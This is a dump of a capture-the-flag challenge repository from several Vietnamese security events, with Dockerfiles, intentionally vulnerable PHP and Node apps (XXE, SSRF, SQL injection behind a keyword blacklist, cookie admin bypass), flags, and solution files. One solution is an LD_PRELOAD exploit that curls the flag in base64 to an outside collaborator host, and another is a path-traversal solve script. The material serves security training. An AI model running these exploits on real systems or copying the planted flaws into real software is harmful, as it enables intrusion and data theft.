14 | 
15 | USER ctf
16 | 
17 | CMD ["/usr/local/bin/python", "/app/app.py"]
18 | 
19 | EXPOSE 80


--------------------------------------------------------------------------------
/Meetup 2020/chall1/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | 	<title>Welcome To KCSC</title>
 5 | 	<link rel="stylesheet" type="text/css" href="index.css">
 6 | </head>
 7 | <body>
 8 | 	<div id="content">
 9 | 		<h2>Welcome to </h2>
10 | 		<h1>KMA Cyber Security Club</h1>
11 | 	</div>
12 | </body>
13 | </html>
14 | <script type="text/javascript" src="index.js"></script>
15 | <!--- Part 1/3:	KCSC{hTmL_-->


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/src/config.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | $DB_HOST = 'mysql';
 5 | $DB_USER = 'root';
 6 | $DB_PASSWORD = 'root';
 7 | $DB_NAME = 'kcsc';
 8 | 
 9 | $conn = new mysqli($DB_HOST, $DB_USER, $DB_PASSWORD, $DB_NAME);
10 | 
11 | if ($conn -> connect_error) {
12 |   echo "Failed to connect to MySQL: " . $conn -> connect_error;
13 |   exit();
14 | }
15 | 
16 | ?>


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Request as a service/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM php:7-apache
 2 | 
 3 | MAINTAINER nhienit
 4 | 
 5 | RUN apt-get update
 6 | 
 7 | RUN a2enmod rewrite
 8 | RUN a2enmod headers
 9 | 
10 | WORKDIR /var/www/html
11 | 
12 | ADD ./chall/ /var/www/html/
13 | 
14 | RUN chown -R www-data:www-data /var/www/html
15 | RUN chmod -R 775 /var/www/html
16 | 
17 | VOLUME /var/www/html
18 | 
19 | CMD apache2-foreground


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/challenge/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "leak-me",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "express": "^4.17.3",
13 |     "puppeteer": "^13.5.2",
14 |     "ejs": "3.1.8"
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/challenge/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "leak-me",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "express": "^4.17.3",
13 |     "puppeteer": "^13.5.2",
14 |     "sqlite-async": "^1.1.3"
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/challenge/public/css/style.css:
--------------------------------------------------------------------------------
 1 | body {
 2 |   background: url('../images/your-name.jpeg');
 3 |   background-size: cover;
 4 | }
 5 | 
 6 | #my_form {
 7 |   width: 25%;
 8 |   height: 25%;
 9 |   background-color: white;
10 |   position: absolute;
11 |   margin: auto;
12 |   transform: translate(150%, 150%);
13 |   border-radius: 2em;
14 |   text-align: center;
15 |   background-color: rgba(0, 0, 0, 0.4);
16 |   color: white;
17 | }


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/pwn me/solution/nhienit.c:
--------------------------------------------------------------------------------
 1 | #include <stdlib.h>
 2 | #include <stdio.h>
 3 | #include <string.h>
 4 | 
 5 | void payload() {
 6 | 	system("curl https://awathv415xqaouykn3znv3ml0c62ur.burpcollaborator.net/flag?flag=$(cat /flag.txt | base64)");
 7 | 	// system("cat /flag.txt> /var/www/html/uploads/flag_for_nhienit.txt");
 8 | }   
 9 | 
10 | int  geteuid() {
11 | 	if (getenv("LD_PRELOAD") == NULL) { return 0; }
12 | 	unsetenv("LD_PRELOAD");
13 | 	payload();
14 | }
15 | 


--------------------------------------------------------------------------------
/Meetup 2020/chall2/s3cr3t_fl4g.txt:
--------------------------------------------------------------------------------
 1 | Do you know it???? :(((
 2 | 
 3 | S0NTQ3tOMWNlISFfeTB1XzRyM19uMHRfUjBiMHR9
 4 | 
 5 | 
 6 | 
 7 | 
 8 | 
 9 | 
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 
16 | 
17 | 
18 | 
19 | 
20 | 
21 | 
22 | 
23 | 
24 | 
25 | 
26 | 
27 | 
28 | 
29 | 
30 | 
31 | 
32 | 
33 | 
34 | 
35 | 
36 | 
37 | 
38 | 
39 | 
40 | 
41 | 
42 | 
43 | 
44 | 
45 | 
46 | 
47 | 
48 | 
49 | 
50 | 
51 | 
52 | 
53 | 
54 | 
55 | 
56 | 
57 | 
58 | 
59 | 
60 | 
61 | 
62 | 
63 | 
64 | 
65 | =====>	Base64 decode


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Client-side check/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM php:5.6-apache
 2 | 
 3 | MAINTAINER nhienit
 4 | 
 5 | RUN apt-get update && \
 6 |     apt-get install -y libmcrypt-dev
 7 | RUN docker-php-ext-install mcrypt
 8 | 
 9 | RUN a2enmod rewrite
10 | RUN a2enmod headers
11 | 
12 | WORKDIR /var/www/html
13 | 
14 | ADD ./chall/ /var/www/html/
15 | 
16 | RUN chown -R www-data:www-data /var/www/html
17 | RUN chmod -R 775 /var/www/html
18 | 
19 | VOLUME /var/www/html
20 | 
21 | CMD apache2-foreground


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM php:7.4-apache
 2 | 
 3 | RUN apt-get update
 4 | RUN docker-php-ext-install mysqli
 5 | RUN a2enmod rewrite
 6 | RUN a2enmod headers
 7 | 
 8 | WORKDIR /var/www/html
 9 | 
10 | ADD ./src/ /var/www/html/
11 | 
12 | RUN chown -R www-data:www-data /var/www/html
13 | RUN chmod -R 775 /var/www/html
14 | 
15 | COPY php.ini /usr/local/etc/php/php.ini-development
16 | 
17 | VOLUME /var/www/html
18 | 
19 | ENTRYPOINT service apache2 start && /bin/bash


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/GalaxyNote/challenge/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "galaxy-notes",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "start": "node app.js",
 8 |     "dev": "nodemon app.js"
 9 |   },
10 |   "keywords": [],
11 |   "author": "",
12 |   "license": "ISC",
13 |   "dependencies": {
14 |     "ejs": "^3.1.10",
15 |     "express": "^5.1.0",
16 |     "mssql": "^11.0.1"
17 |   },
18 |   "devDependencies": {
19 |     "nodemon": "^3.1.10"
20 |   }
21 | }
22 | 


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/challenge/views/index.html:
--------------------------------------------------------------------------------
 1 | <h1>Create your note</h1>
 2 | 
 3 | <form action="/create" method="POST">
 4 |     <label for="note">Note: </label>
 5 |     <input type="text" name="note" />
 6 |     <br />
 7 |     <label for="author">Author: </label>
 8 |     <input type="text" name="author">
 9 |     <br />
10 |     <input type="submit" value="Submit" />
11 | </form>
12 | 
13 | <a href="/notes">View all notes</a>
14 | <br />
15 | 
16 | <a href="/report">Report</a>
17 | <br />


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/pwn me/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM php:7-apache
 2 | 
 3 | MAINTAINER nhienit
 4 | 
 5 | RUN apt-get update
 6 | 
 7 | RUN a2enmod rewrite
 8 | RUN a2enmod headers
 9 | 
10 | WORKDIR /var/www/html
11 | 
12 | ADD ./src/ /var/www/html/
13 | 
14 | RUN chown -R www-data:www-data /var/www/html
15 | RUN chmod -R 775 /var/www/html
16 | RUN chmod -R 777 /var/www/html/uploads
17 | 
18 | RUN echo "KMACTF{LD_Preload is also a way to RCE}" > /flag.txt
19 | 
20 | VOLUME /var/www/html
21 | 
22 | CMD apache2-foreground


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3.5'
 2 | services:
 3 |   mysql:
 4 |     image: mariadb:10.5.8
 5 |     restart: always
 6 |     volumes:
 7 |       - ./db/db.sql:/docker-entrypoint-initdb.d/database.sql
 8 |     environment:
 9 |       - MYSQL_DATABASE=ninjashop
10 |       - MYSQL_ROOT_PASSWORD=Abcd@1234
11 |   web:
12 |     build: .
13 |     depends_on:
14 |       - mysql
15 |     ports:
16 |       - '20109:80'
17 |     stdin_open: true
18 | volumes:
19 |   db:
20 |     driver: local


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3'
 2 | 
 3 | services:
 4 |   mysql:
 5 |     image: mysql:5.6
 6 |     restart: always
 7 |     volumes:
 8 |       - ./database.sql:/docker-entrypoint-initdb.d/database.sql
 9 |     environment:
10 |       - MYSQL_DATABASE=kcsc
11 |       - MYSQL_ROOT_PASSWORD=root
12 |   web:
13 |     build: .
14 |     depends_on:
15 |       - mysql
16 |     ports:
17 |       - '10666:80'
18 |     volumes:
19 |       - ./src:/var/www/html
20 |     stdin_open: true
21 | 


--------------------------------------------------------------------------------
/Meetup 2020/chall1/index.css:
--------------------------------------------------------------------------------
 1 | * {
 2 | 	margin: 0;
 3 | 	padding: 0;
 4 | 	box-sizing: border-box;
 5 | }
 6 | body {
 7 | 	background-image: url("images/cybersecvn.jpg");
 8 | 	background-position: center;
 9 | 	background-repeat: no-repeat;
10 | 	background-size: 1928px 1600px;
11 | 	margin-top: 150px;
12 | }
13 | #content {
14 | 	position: absolute;
15 | 	color: white;
16 | 	margin: 100px 100px;
17 | 	font-size: 24px;
18 | }
19 | #content h1 {
20 | 	margin-top: 120px;
21 | 	color: orange;
22 | 	font-weight: bold;
23 | }
24 | 
25 | /*Part 2/3:	cSs_*/


--------------------------------------------------------------------------------
/Meetup 2020/chall3/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | 	<title>Eat Cookieeeeeeeeee</title>
 5 | 	<link rel="stylesheet" type="text/css" href="index.css">
 6 | </head>
 7 | <body>
 8 | 	<dir id="form">
 9 | 		<h1>Would you like to eat some c00ki3?????</h1>
10 | 		<p>Enter your name to order cookie!!!</p>
11 | 		<form action="index.php" method="POST">
12 | 			<input type="text" name="name" placeholder="Your name..." /> <br>
13 | 			<input type="submit" name="submit" value="submit">
14 | 		</form>
15 | 	</dir>
16 | </body>
17 | </html>


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/user.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class User {
 4 | 	public $username;
 5 | 	private $password;
 6 | 	public $avatar;
 7 | 
 8 | 	public function __construct($username, $password, $avatar) {
 9 | 		$this->username = $username;
10 | 		$this->password = $password;
11 | 		$this->avatar = $avatar;
12 | 	}
13 | 
14 | 	public function getPassword() {
15 | 		return $this->password;
16 | 	}
17 | 
18 | 	function __toString() {
19 | 		echo "Username: ".$this->username . " - Avatar: ". $this->avatar->url;
20 | 	}
21 | }
22 | 
23 | ?>


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3.5'
 2 | services:
 3 |   mysql:
 4 |     image: mysql:5.6
 5 |     restart: always
 6 |     volumes:
 7 |       - ./db/schema.sql:/docker-entrypoint-initdb.d/database.sql
 8 |     environment:
 9 |       - MYSQL_DATABASE=kmactf
10 |       - MYSQL_ROOT_PASSWORD=mauFJcuf5dhRMQrjj
11 |   web:
12 |     build: .
13 |     depends_on:
14 |       - mysql
15 |     ports:
16 |       - '20108:80'
17 |     volumes:
18 |       - ./src:/var/www/html
19 |     stdin_open: true
20 | volumes:
21 |   db:
22 |     driver: local


--------------------------------------------------------------------------------
/Meetup 2020/chall3/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 	if ( isset($_POST["name"]) ) {
 3 | 		$name = $_POST["name"];
 4 | 		if ( !isset($_COOKIE["is_admin"]) ) 
 5 | 			setcookie("is_admin", "0");
 6 | 	}
 7 | 
 8 | 	if ($_COOKIE["is_admin"] === "1")
 9 | 		require "config.php";
10 | ?>
11 | 
12 | <!DOCTYPE html>
13 | <html>
14 | <head>
15 | 	<title>Eat Cookieeeeeeeeee</title>
16 | 	<link rel="stylesheet" type="text/css" href="index.css">
17 | </head>
18 | <body>
19 | 	<dir id="form">
20 | 		<?php 
21 | 			if ($flag) 
22 | 				echo "<h1>$flag</h1>";
23 | 			else
24 | 				echo "<h1>Oh no!!! Only admin can order cookie :(((((</h1>"
25 | 		?>
26 | 	</dir>
27 | </body>
28 | </html>


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM php:7.4-apache
 2 | 
 3 | MAINTAINER nhienit
 4 | 
 5 | RUN apt-get update
 6 | RUN docker-php-ext-install mysqli
 7 | RUN a2enmod rewrite
 8 | RUN a2enmod headers
 9 | 
10 | WORKDIR /var/www/html
11 | 
12 | ADD ./src/ /var/www/html/
13 | 
14 | RUN chown -R www-data:www-data /var/www/html
15 | RUN chmod -R 775 /var/www/html
16 | RUN chmod -R 777 /var/www/html/uploads
17 | 
18 | RUN echo "KMACTF{fr0m_XXE_t0_ph4r_uNs3ri4l1ze}" > /n1c3_fl4444g_f0r_r3al_h4ck3r
19 | 
20 | COPY php.ini /usr/local/etc/php/php.ini-development
21 | 
22 | VOLUME /var/www/html
23 | 
24 | ENTRYPOINT service apache2 start && /bin/bash


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/src/classes/curl.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class CURL {
 4 | 	public $url;
 5 | 
 6 | 	public function __construct($url) {
 7 | 		$this->url = $url;
 8 | 	}
 9 | 
10 | 	public function getData() {
11 | 		$ch = curl_init();
12 | 		curl_setopt($ch, CURLOPT_URL, $this->url);
13 | 		curl_setopt($ch, CURLOPT_HEADER, 0);  
14 | 		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
15 | 		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
16 | 
17 | 		$result = curl_exec($ch);
18 | 	
19 | 		if ($result === FALSE) {
20 | 			return "error while retrieving data!!";
21 | 		} 
22 | 		
23 | 		curl_close($ch);
24 | 	}
25 | }
26 | 
27 | ?>


--------------------------------------------------------------------------------
/Meetup 2020/chall3/index.css:
--------------------------------------------------------------------------------
 1 | * {
 2 | 	margin: 0;
 3 | 	padding: 0;
 4 | 	box-sizing: border-box;
 5 | }
 6 | 
 7 | body {
 8 | 	background-image: url("images/cookie.jpg");
 9 | }
10 | 
11 | #form {
12 | 	position: relative;
13 | 	margin: 50px 450px;
14 | 	width: 1000px;
15 | 	height: 300px;
16 | 	background: rgba(255,255,255,0.5);
17 | 	border-radius: 50px;
18 | }
19 | 
20 | #form h1 {
21 | 	font-size: 40px;
22 | 	color: rgb(145, 13, 222);
23 | 	margin: 50px 50px;
24 | }
25 | 
26 | #form p {
27 | 	font-size: 24px;
28 | 	margin-left: 50px;
29 | }
30 | #form input {
31 | 	margin-left: 50px;
32 | 	margin-top: 20px;
33 | }
34 | #form input[name="name"] {
35 | 	padding: 10px;
36 | 	width: 80%;
37 | 	border-radius: 10px;
38 | }


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/GalaxyNote/challenge/config.js:
--------------------------------------------------------------------------------
 1 | const sql = require("mssql");
 2 | 
 3 | const dbConfig = {
 4 |   user: process.env.DB_USER || "sa",
 5 |   password: process.env.DB_PASSWORD || "GalaxyOne@2025",
 6 |   server: process.env.DB_SERVER || "10.0.2.182",
 7 |   port: parseInt(process.env.DB_PORT) || 14333,
 8 |   database: process.env.DB_NAME || "hackathon",
 9 |   options: {
10 |     encrypt: false,
11 |     trustServerCertificate: true,
12 |   },
13 | };
14 | 
15 | async function getConnection() {
16 |   try {
17 |     const pool = await sql.connect(dbConfig);
18 |     return pool;
19 |   } catch (err) {
20 |     throw err;
21 |   }
22 | }
23 | 
24 | module.exports = {
25 |   sql,
26 |   dbConfig,
27 |   getConnection,
28 | };


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/db/db.sql:
--------------------------------------------------------------------------------
 1 | USE ninjashop;
 2 | 
 3 | CREATE TABLE users(uid int AUTO_INCREMENT PRIMARY KEY, username VARCHAR(32), password VARCHAR(32), fullname VARCHAR(255));
 4 | CREATE TABLE coins(id int AUTO_INCREMENT PRIMARY KEY, coin INT, uid INT, update_count INT);
 5 | CREATE TABLE ninja(id int AUTO_INCREMENT PRIMARY KEY, ninja_name VARCHAR(32), slug_name VARCHAR(32), price INT);
 6 | 
 7 | INSERT INTO ninja VALUES (1, "Uzumaki Naruto", "naruto", 10);
 8 | INSERT INTO ninja VALUES (2, "Uchiha Sasuke", "sasuke", 30);
 9 | INSERT INTO ninja VALUES (3, "Hatake Kakashi","kakashi", 70);
10 | INSERT INTO ninja VALUES (4, "Flag - My Secret", "flag", 1337);
11 | INSERT INTO ninja VALUES (5, "Uchiha Itachi","itachi", 90);


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/buy.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require 'config.php';
 3 | 
 4 | if (!isset($_SESSION['user'])) {
 5 |     header("Location: login.php");
 6 | }
 7 | 
 8 | $data = file_get_contents("php://input");
 9 | if (strlen($data) > 0 ) {
10 |     libxml_disable_entity_loader (false);
11 |     $dom = new DOMDocument();
12 |     $dom->loadXML($data, LIBXML_NOENT | LIBXML_DTDLOAD);
13 |     $item = simplexml_import_dom($dom);
14 |     $name = $item->name;
15 |     $price = $item->price;
16 | } else {
17 |     die("No data found");
18 | }
19 | 
20 | $msg = "Thank for your visit shop\n";
21 | $msg .= "The product you purchased is $name\n";
22 | $msg .= "This feature is currently under development, please try again later.\n";
23 | 
24 | echo $msg;
25 | ?>


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/challenge/views/notes.html:
--------------------------------------------------------------------------------
 1 | <div id="notes">
 2 | 
 3 | </div>
 4 | 
 5 | <script>
 6 |     fetch("/api/notes")
 7 |     .then(r => r.text())
 8 |     .then(d => {
 9 | 	let data = JSON.parse(d)
10 | 	for (let i=0; i<data.length; ++i) {
11 |         	let div = document.createElement("div");
12 | 		div.setAttribute("name", "note");
13 | 		
14 | 		let note = document.createElement("p");
15 | 		note.appendChild(document.createTextNode(data[i].note));
16 | 		div.appendChild(note);
17 | 
18 | 		let author = document.createElement("strong");
19 | 		author.appendChild(document.createTextNode(data[i].author));
20 | 		div.appendChild(author);
21 | 
22 | 		document.getElementById("notes").appendChild(div);
23 | 	}
24 |     })
25 | </script>


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Request as a service/chall/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require_once 'config.php';
 3 | 
 4 | if ( $_SERVER['REMOTE_ADDR'] === "127.0.0.1") {
 5 | 	if ( !empty($_SERVER["HTTP_X_KEY"]) && !empty($_SERVER["HTTP_X_FLAG"]) && $_SERVER["HTTP_X_KEY"] === "K3Y_t0_G3t_flaggggg" && $_SERVER["HTTP_X_FLAG"] === "KCSC") 
 6 | 		echo $flag;
 7 | }
 8 | 
 9 | 
10 | if ( isset($_GET["url"]) ) {
11 | 	$url = $_GET["url"];
12 | 
13 | 	if (preg_match("/^file|php|zip|data|input|expect|phar/i", $url))
14 | 		die("Don't cheat");
15 | 
16 | 	$ch = curl_init();
17 | 	curl_setopt($ch, CURLOPT_URL, $url);
18 | 	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
19 | 	$result = curl_exec($ch);
20 | 	echo $result;
21 | 	curl_close($ch);
22 | } else 
23 | 	show_source(__FILE__);
24 | 
25 | ?>


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/challenge/index.js:
--------------------------------------------------------------------------------
 1 | const express       = require('express');
 2 | const app           = express();
 3 | const path          = require('path');
 4 | const routes        = require('./routes');
 5 | 
 6 | app.use(express.json())
 7 | app.set('views', './views');
 8 | app.use(express.urlencoded({ extended: true }));
 9 | app.engine('html', require('ejs').renderFile);
10 | app.set('view engine', 'ejs');
11 | app.use(routes());
12 | app.use(express.static('public'))
13 | app.disable('etag');
14 | 
15 | app.all('*', (req, res) => {
16 |     return res.status(404).send({
17 |         message: '404 page not found'
18 |     });
19 | });
20 | 
21 | (async () => {
22 |     app.listen(13337, '0.0.0.0', () => console.log('Listening on port 13337'));
23 | })();


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/src/api/checkUser.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | header('Content-Type: application/json');
 3 | 
 4 | require '../config.php';
 5 | 
 6 | 
 7 | if ($_SERVER['REMOTE_ADDR'] === '127.0.0.1') {
 8 | 
 9 | 	
10 | 	if (!isset($_GET['id'])) {
11 | 		echo json_encode(array('result' => 'Missing parameter!!'));
12 | 	} else {
13 | 		$id = $_GET['id'];
14 | 		$id = preg_replace('/join|group|having|or|select|from|where|\ /', '',$id);
15 | 		$query = 'SELECT * FROM users WHERE id='.$id;
16 | 		$result = $conn->query($query);
17 | 
18 | 		if ($result->num_rows > 0) {
19 | 			//echo $result;  hmmmm?? Đâu dễ vậy được :))))
20 | 		}
21 | 	}
22 | } else {
23 | 	echo json_encode(array('result' => $_SERVER['REMOTE_ADDR'].'Only localhost can access that feature!!!'));
24 | }
25 | ?>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM php:8.2.0-apache
 2 | 
 3 | RUN apt-get update && apt-get install -y \
 4 |     libmagickwand-dev \
 5 |     libmagickcore-dev \
 6 |     --no-install-recommends \
 7 |     && pecl install imagick \
 8 |     && docker-php-ext-enable imagick \
 9 |     && apt-get clean \
10 |     && rm -rf /var/lib/apt/lists/*
11 | 
12 | RUN a2enmod rewrite
13 | RUN a2enmod headers
14 | 
15 | WORKDIR /var/www/html
16 | ADD ./src/ /var/www/html/
17 | COPY ./php.ini /usr/local/etc/php/php.ini-development
18 | COPY flag /flag
19 | COPY readflag /readflag
20 | 
21 | RUN chown -R root:root /var/www/html \
22 |     && chmod -R 755 /var/www/html \
23 |     && chmod 400 /flag \
24 |     && chmod 111 /readflag \
25 |     && chmod u+s /readflag
26 | 
27 | ENTRYPOINT service apache2 start && /bin/bash


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/challenge/index.js:
--------------------------------------------------------------------------------
 1 | const express       = require('express');
 2 | const app           = express();
 3 | const path          = require('path');
 4 | const routes        = require('./routes');
 5 | const Database      = require('./database');
 6 | 
 7 | const db = new Database('leak-me.db');
 8 | 
 9 | app.use(express.json())
10 | app.set('views', './views');
11 | app.use(express.urlencoded({ extended: true }));
12 | 
13 | app.use(routes(db));
14 | 
15 | app.disable('etag');
16 | 
17 | app.all('*', (req, res) => {
18 |     return res.status(404).send({
19 |         message: '404 page not found'
20 |     });
21 | });
22 | 
23 | (async () => {
24 |     await db.connect();
25 |     await db.init();
26 | 
27 |     app.listen(13337, '0.0.0.0', () => console.log('Listening on port 13337'));
28 | })();


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/src/config.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | $FLAG = "HDBH{Just_s1mpl3_SQLi_ch4ll4ng3_348d4bf1280cba56495474d4cf2b1c50}";
 5 | $DB_HOST = "mysql"; // change me
 6 | $DB_USER = "root"; // change me
 7 | $DB_PASS = "Abcd@1234"; // change me
 8 | $DB_NAME = "ninjashop";
 9 | 
10 | $connection = new mysqli($DB_HOST, $DB_USER, $DB_PASS, $DB_NAME);
11 | if ($connection->connect_error) {
12 |     die("<strong>MySQL connection error</strong>");
13 | }
14 | 
15 | function waf($input) {
16 |     // Prevent sqli -.-
17 |     $blacklist = join("|", ["sleep", "benchmark", "order", "limit", "exp", "extract", "xml", "floor", "rand", "count", "or" ,"and", ">", "<", "\|", "&","\(", "\)", "\\\\" ,"1337", "0x539"]);
18 |     if (preg_match("/${blacklist}/si", $input)) die("<strong>Stop! No cheat =))) </strong>");
19 |     return TRUE;
20 | }
21 | 
22 | ?>


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/database.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class Database {
 4 | 	public $servername;
 5 | 	public $username;
 6 | 	public $password;
 7 | 	public $database;
 8 | 	public $is_connected;
 9 | 
10 | 	function __construct($servername, $username, $password, $database) {
11 | 		$this->servername = $servername;
12 | 		$this->username = $username;
13 | 		$this->password = $password;
14 | 		$this->database = $database;
15 | 	}
16 | 
17 | 	function connect() {
18 | 		$conn = new mysqli($this->servername, $this->username, $this->password, $this->database);
19 | 		if ($conn->connect_error) {
20 | 		  die("Connection failed: " . $conn->connect_error);
21 | 		}
22 | 		$this->is_connected = 1;
23 | 		return $conn;
24 | 	}
25 | 
26 | 	function __wakeup() {
27 | 		if (!$this->is_connected) {
28 | 			echo "Cannot connect to database: ".$this->database;
29 | 		}
30 | 	}
31 | }
32 | 
33 | ?>


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/challenge/public/js/app.js:
--------------------------------------------------------------------------------
 1 | document.libs = ['https://cdnjs.cloudflare.com/ajax/libs/dompurify/2.4.0/purify.min.js']
 2 | 
 3 | function loadResource(src) {
 4 |   const script = document.createElement('script');
 5 |   script.async = true;
 6 |   script.src = src;
 7 |   
 8 |   if (script.src.includes('jsonp') || decodeURIComponent(script.src).includes('jsonp')) {
 9 |     throw new Error('No hack')
10 |   }
11 |   
12 |   document.body.appendChild(script);
13 | }
14 | 
15 | function validateScript(index) {
16 |   setTimeout(() => {
17 |     const element = document.libs[index]
18 |     const src = element.getAttribute('src')
19 | 
20 |     if (!src.startsWith('https://cdnjs.cloudflare.com/ajax/libs/dompurify/2.4.0/')) {
21 |       throw new Error('Invalid source')
22 |     }
23 |     
24 |     element.parentNode.removeChild(element)
25 |     loadResource(src)
26 |   }, 1000)
27 | }
28 | 
29 | // validateScript(0)


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:current-buster-slim
 2 | 
 3 | # Install packages
 4 | RUN apt-get update \
 5 |     && apt-get install -y wget supervisor gnupg \
 6 |     && wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - \
 7 |     && sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' \
 8 |     && apt-get update \
 9 |     && apt-get install -y google-chrome-stable fonts-ipafont-gothic fonts-wqy-zenhei fonts-thai-tlwg fonts-kacst fonts-freefont-ttf libxss1 \
10 |     --no-install-recommends \
11 |     && rm -rf /var/lib/apt/lists/*
12 |     
13 | # Setup app
14 | RUN mkdir -p /app
15 | 
16 | # Add application
17 | WORKDIR /app
18 | COPY challenge .
19 | 
20 | # Install dependencies
21 | RUN yarn
22 | 
23 | CMD ["npm", "install"]
24 | # Expose the port node-js is reachable on
25 | EXPOSE 13337
26 | 
27 | # Start the node-js application
28 | CMD ["node", "index.js"]
29 | 


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:current-buster-slim
 2 | 
 3 | # Install packages
 4 | RUN apt-get update \
 5 |     && apt-get install -y wget supervisor gnupg \
 6 |     && wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - \
 7 |     && sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' \
 8 |     && apt-get update \
 9 |     && apt-get install -y google-chrome-stable fonts-ipafont-gothic fonts-wqy-zenhei fonts-thai-tlwg fonts-kacst fonts-freefont-ttf libxss1 \
10 |     --no-install-recommends \
11 |     && rm -rf /var/lib/apt/lists/*
12 |     
13 | # Setup app
14 | RUN mkdir -p /app
15 | 
16 | # Add application
17 | WORKDIR /app
18 | COPY challenge .
19 | 
20 | # Install dependencies
21 | RUN yarn
22 | 
23 | CMD ["npm", "install"]
24 | # Expose the port node-js is reachable on
25 | EXPOSE 13337
26 | 
27 | # Start the node-js application
28 | CMD ["node", "index.js"]
29 | 


--------------------------------------------------------------------------------
/KCSC Recruit/EnCryptBoizzz/solution/sol.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import re
 3 | from string import printable
 4 | import time
 5 | 
 6 | url = "http://45.77.39.59:2010"
 7 | r = requests.Session()
 8 | phpsessid = "520mekuh9645iahrd6nj51am2m"
 9 | BLOCK_SIZE = 16
10 | 
11 | def setName(name):
12 | 	return r.get(url, params = {"name": name}, cookies={"PHPSESSID": phpsessid})
13 | 
14 | def getBlocks():
15 | 	data = r.get(
16 | 		url, 
17 | 		params={"file": f"../../../tmp/sess_{phpsessid}"}, 
18 | 		cookies={"PHPSESSID": phpsessid}
19 | 	).text
20 | 
21 | 	enc = re.findall(r'name|s:\d+:"(?P<enc>.*)";',data)[1]
